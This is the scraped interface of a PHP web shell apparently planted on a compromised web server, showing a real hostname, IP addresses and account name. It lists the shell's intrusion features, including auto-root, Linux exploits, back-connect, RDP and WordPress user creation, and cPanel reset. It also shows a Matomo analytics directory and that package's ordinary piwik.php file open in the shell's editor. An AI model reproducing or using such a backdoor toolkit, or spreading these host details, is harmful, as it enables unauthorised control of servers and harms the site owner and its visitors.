Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.222.161.245
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
matomo
[ DIR ]
drwxr-xr-x
misc
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
CHANGELOG.md
99.68
KB
-rw-r--r--
CONTRIBUTING.md
929
B
-rw-r--r--
DIObject.php
578
B
-rw-r--r--
LEGALNOTICE
8.44
KB
-rw-r--r--
LICENSE
34.32
KB
-rw-r--r--
LegacyAutoloader.php
828
B
-rw-r--r--
PRIVACY.md
4.51
KB
-rw-r--r--
README.md
5.78
KB
-rw-r--r--
SECURITY.md
1.83
KB
-rw-r--r--
console
753
B
-rwxr-xr-x
favicon.ico
0
B
-rw-r--r--
index.php
712
B
-rw-r--r--
matomo.js
64.3
KB
-rw-r--r--
matomo.php
328
B
-rw-r--r--
offline-service-worker.js
6.23
KB
-rw-r--r--
piwik.js
64.3
KB
-rw-r--r--
piwik.php
2.62
KB
-rw-r--r--
robots.txt
770
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : piwik.php
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later */ use Piwik\SettingsServer; use Piwik\Tracker\RequestSet; use Piwik\Tracker; use Piwik\Tracker\Handler; use Piwik\API\CORSHandler; @ignore_user_abort(true); // Note: if you wish to debug the Tracking API please see this documentation: // http://developer.piwik.org/api-reference/tracking-api#debugging-the-tracker if (!defined('PIWIK_DOCUMENT_ROOT')) { define('PIWIK_DOCUMENT_ROOT', dirname(__FILE__) == '/' ? '' : dirname(__FILE__)); } if (file_exists(PIWIK_DOCUMENT_ROOT . '/bootstrap.php')) { require_once PIWIK_DOCUMENT_ROOT . '/bootstrap.php'; } if (!defined('PIWIK_INCLUDE_PATH')) { define('PIWIK_INCLUDE_PATH', PIWIK_DOCUMENT_ROOT); } require_once PIWIK_INCLUDE_PATH . '/core/bootstrap.php'; require_once PIWIK_INCLUDE_PATH . '/core/Plugin/Controller.php'; require_once PIWIK_INCLUDE_PATH . '/core/Exception/NotYetInstalledException.php'; require_once PIWIK_INCLUDE_PATH . '/core/Plugin/ControllerAdmin.php'; require_once PIWIK_INCLUDE_PATH . '/core/Singleton.php'; require_once PIWIK_INCLUDE_PATH . '/core/Plugin/Manager.php'; require_once PIWIK_INCLUDE_PATH . '/core/Plugin.php'; require_once PIWIK_INCLUDE_PATH . '/core/Common.php'; require_once PIWIK_INCLUDE_PATH . '/core/Piwik.php'; require_once PIWIK_INCLUDE_PATH . '/core/IP.php'; require_once PIWIK_INCLUDE_PATH . '/core/UrlHelper.php'; require_once PIWIK_INCLUDE_PATH . '/core/Url.php'; require_once PIWIK_INCLUDE_PATH . '/core/SettingsPiwik.php'; require_once PIWIK_INCLUDE_PATH . '/core/SettingsServer.php'; require_once PIWIK_INCLUDE_PATH . '/core/Tracker.php'; require_once PIWIK_INCLUDE_PATH . '/core/Config.php'; require_once PIWIK_INCLUDE_PATH . '/core/Tracker/Cache.php'; require_once PIWIK_INCLUDE_PATH . '/core/Tracker/Request.php'; require_once PIWIK_INCLUDE_PATH . '/core/Cookie.php'; require_once PIWIK_INCLUDE_PATH . '/core/API/CORSHandler.php'; SettingsServer::setIsTrackerApiRequest(); $environment = new \Piwik\Application\Environment('tracker'); try { $environment->init(); } catch(\Piwik\Exception\NotYetInstalledException $e) { die($e->getMessage()); } Tracker::loadTrackerEnvironment(); $corsHandler = new CORSHandler(); $corsHandler->handle(); $tracker = new Tracker(); $requestSet = new RequestSet(); ob_start(); try { $handler = Handler\Factory::make(); $response = $tracker->main($handler, $requestSet); if (!is_null($response)) { echo $response; } } catch (Exception $e) { echo "Error:" . $e->getMessage(); exit(1); } if (ob_get_level() > 1) { ob_end_flush(); }
Close